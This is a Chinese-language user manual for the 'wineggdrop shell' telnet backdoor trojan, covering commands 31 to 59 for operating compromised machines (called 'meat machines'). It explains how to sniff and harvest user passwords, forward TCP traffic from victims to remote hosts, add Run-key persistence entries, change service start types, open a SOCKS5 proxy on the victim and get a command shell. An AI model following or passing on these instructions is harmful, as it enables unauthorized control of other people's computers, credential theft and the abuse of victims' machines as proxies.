telnet木马wineggdrop shell 极终版使用说明书.txt

黑客的指令

31.TerminalPort 功能:查看终端服务端口
用法:TerminalPort 

32.TerminalPort 新的端口 功能:重新设置终端服务端口
用法:TerminalPort 新的端口
注意:新端口必须是合法的端口,否则程序会返回错误。

33.Redirect 功能说明:TCP数据转发
用法:Redirect 端口 远程系统IP 远程端口
例子:Redirect 2222 12.12.12.12 3333 (这样任何连接到肉机2222端口的TCP数据都会转发到
12.12.12.12这个IP的端口3333中去)
例子:Redirect 2222 www.abc.com 3333 (这样任何连接到肉机2222端口的TCP数据都会转发到
www.abc.com的端口3333中去)

34.ViewThreads 功能说明:查看TCP数据转发打开的线程
用法:ViewThreads 

35.KillThreads 功能说明:杀掉某个TCP数据转发的线程
用法:KillThreads 线程号
注:这里的线程号是通过用ViewThreads看到的

36.EnableFilter 功能说明:激活TCP/IP过滤
用法:EnableFilter

37.DisableFilter 功能说明:禁止TCP/IP过滤
用法:DisableFilter

38.FilterInfo 功能说明:查看TCP/IP过滤是处于激活还是禁止状态
用法:FilterInfo

39.AR 功能说明:恢复系统几个常用的关联的设置
用法:AR

40.GetUser 功能说明:列举系统所有帐户
用法:GetUser

41.ViewPath 功能说明:查看当前目录
用法:ViewPath

42.SetPath 功能说明:设置当前目录
用法:SetPath 目录

43.SID 功能说明:查看本地或远程系统帐户的SID
用法:SID Local|IP
例子:SID Local (查看本地帐户的SID)
例子:SID IP (查看远程IP的帐户的SID,只有允许空连接，当会成功看到)

44.ViewTimeOut 功能说明:查看超时秒数
用法:ViewTimeOut

45.SetTimeOut 功能说明:设置超时秒数
用法:SetTimeOut 秒数

46.StartSniffer 功能说明:启动嗅觉密码功能
用法:StartSniffer NIC
例子:StartSniffer 0
注意:这里的NIC是网卡的号，很多系统有几个网卡的，所以你要有选择地选网卡进行
嗅觉，使用ListIP功能可以看到网卡对应的IP以及网卡号.结果会保存到Sniffer.dll
中去

47.StopSniffer 功能说明:停止嗅觉功能
用法:StopSniffer

48.ViewSniffer 功能说明:查看嗅觉密码功能是否在进行
用法:ViewSniffer

49.Sysinfo 功能说明:查看系统的信息
用法:Sysinfo

50.ViewService 功能说明:查看某个服务的状态
用法:ViewService ServiceName
例子:ViewService Norton Antivirus Server

51.ConfigService 功能说明:修改某个服务的启动状态
用法:ConfigService StartType ServiceName
例子:ConfigService Auto W3svc -->将IIS服务启动状态改为自动
例子:ConfigService Demand w3svc -->将IIS服务启动状态改为手动
例子:ConfigService Disable w3svc -->将IIS服务启动状态改为禁止
注意:上面参数中的StartType只可以是Auto,Demand,Disable中的其中一种，Auto代表自动，
Demand代表手动以及Disable代表禁止.

52.ViewKey 功能说明:查看run和runservices所有的项
用法:ViewKey

54.DelKey 功能说明:删除run和runservices中的一个启动项
用法:DelKey KeyName
例子1: DelKey radmm
例子2: DelKey Tk BellExe

53.EnumService 功能说明:列举所有自动启动的服务的资料
用法:EnumService

55.RegEdit 功能说明:进入注册表操作模式
用法:RegEdit
注意:如果你对于注册表并不熟悉(例如对注册表结构，数据类型等没有一个大概的认识的话，最
好就不要使用这个功能，特别是删除键或键值的功能。注册表中的数据是每重要的，修改
或删除一些重要的数据的话，很容易导致系统无法加载的，特别是后门是以服务启动的，
这样给了用户可以操作sam下数据的能力，所以不要乱用删除功能。
当输入RegEdit后，后门会从进入注册表的操作模式，你如果输入Help的话，会看到很多命令，这
些命令是当进入注册表操作模式后能起作用的，这些命令如下:

DirValue 功能说明:列出当前键下的所有项

DirKey 功能说明:列出当前的所有键

CD.. 功能说明:向后退一个键
例子:你现在是在hklm\software\microsoft下的话，输入cd..，那么当前你在注册表的位置就
会转到hklm\software下了。

Root 功能说明:退出注册表的根下
例子:无论你在注册表那个位置，输入root就会返回到hklm下

Exit 功能说明:退出注册表模式

Help 功能说明:输出帮助

CD KeyName 功能说明:进入某个键中去
例子:假设你正在在注册表中的hklm\software下，你输入cd microsoft,那么就会下入到hklm\software\microsoft
中去。

DelValue ValueName 功能说明:删除一个键值
例子:假设你是在hklm\software\microsoft下，这个键下有一项值是test,你输入
DelValue test,就会将test这个键值删除

DelKey KeyName 功能说明:删除一个键
例子:假设你在hklm\software\microsoft下，这个键下有一个键叫abc,你输入
DelKey abc,就会将abc整个键删除。(小心使用这个功能，因为会将整个键
删除，那个键下的键以及键值都会被删除)

Set Type ValueName Value 功能说明:增加一个键值
例子:假设你在hklm\software\microsoft\windows\currentversion\run下，你输入
Set REG_SZ test hook.exe,这样就会在run下生成一个test的键值，键值执行的程序是
hook.exe.
注意:这里的Type常用的只有几种，REG_SZ,REG_DWORD,REG_MUL_SZ,EG_EXPAND_SZ,当中以REG_SZ
最为常用。

55.Findpassword 功能说明:得到所有登陆用户的密码
用法:Findpassword

56.ExitShell 功能说明:在cmd的shell下返回到[Melody]模式
用法:ExitShell
注意:这命令是当用户得到一个cmd下的shell后，想退回到[Melody]那里去使用后门的命令时才使用.

57.StartProxy 功能说明:启动Sock5代理
用法: StartProxy [UserName] [Password] Port AllowedIP
说明: 
A.参数中的[UserName]和[Password]是可选项，如果没有的话，那就是无密码验证。
B.Port是代理打开的端口
C.AllowedIP是哪些IP是允许连接代理的，如果所有IP都可以连接，参数为All.
例子1: StartProxy 12345 All -->代理端口为12345,没有密码验证，所有IP都可以连
例子2: StartProxy Guest test 12345 All -->代理端口为12345,有密码验证，所有IP都可以连
例子3: StartProxy 12345 211.11.*.* -->代理端口为12345,没有密码验证，只有以211.11开头的IP可以连上代理。
例子4: StartProxy Abc abc 12345 12.12.*.* -->代理端口为12345,有密码验证，只有12.12开头的IP可以连上代理

58.StopProxy 功能说明:停止Sock5代理
用法: StopProxy
注意:当系统是NT 4.0时，使用此命令时会返回"Fail To Stop UDP Thread"的信息，其实是成功停
止了的，只是因为NT 4.0本身对某个API的返回的问题，所以会出现这个错误信息，但在win 2k
或xp是没有问题的。

59.ViewProxyInfo 功能说明:查看Sock5代理信息
用法:ViewProxyInfo


有必要加以说明的功能:
1.ExitShell
此功能主要是用于当用户成功得到一个Cmd下的shell后，想回到[Melody]模式下去继续使用命令
，就可以使用ExitShell直接切换会[Melody]模式，这样就方便用户不需要直接断开，然后再连
接上后门才可以到达[Melody]模式。

2.Cmd Redirector
此功能主要是方便用户在[Melody]模式下想运行一些系统本身命令或外部命令，但又不想直接进
入到cmd的shell所设，例如用户在[Melody]模式下想查看系统帐户Guest的一些信息，用户可以
直接在[Melody]模式下直接输入net user Guest,然后就可以看到Guest用户的信息了，当然用
户也可以直接进入到shell模式下去运行上面的命令。此功能基本上可以理解为一个模拟的Shell
,所不同的只是不需要多设置一个写的管道，而且因为后门程序只允许一个用户得到cmd下的Shell,
所以增加了这功能可以方便其他无法得到shell的用户使用此功能去得到一个模拟的Shell.

3.Sock5代理
Sock5代理是支持无密码和密码验证两种方式的，但由于局部网本身的限制问题，不借助第三方
程序是无法在udp协议的应用程序(oicq或其它在线游戏等)上使用sock5代理的，并且因为skservergui
那程序不支持我这个代理，所以暂时在局部网内用户在oicq等上要使用这个代理是有问题的，但
tcp协议的程序(icq,msn,yahoo messnger,irc等)是没有问题的,如果你使用这代理无法在局部网
上oicq的话，请不要问我为什么，上面的话已说得非常清楚了，如果不明白为什么udp协议的应用
程序在局部网内不借助第三方程序无法使用sock5代理连接，请自己查找有关udp协议和局部网相
关的资料查看。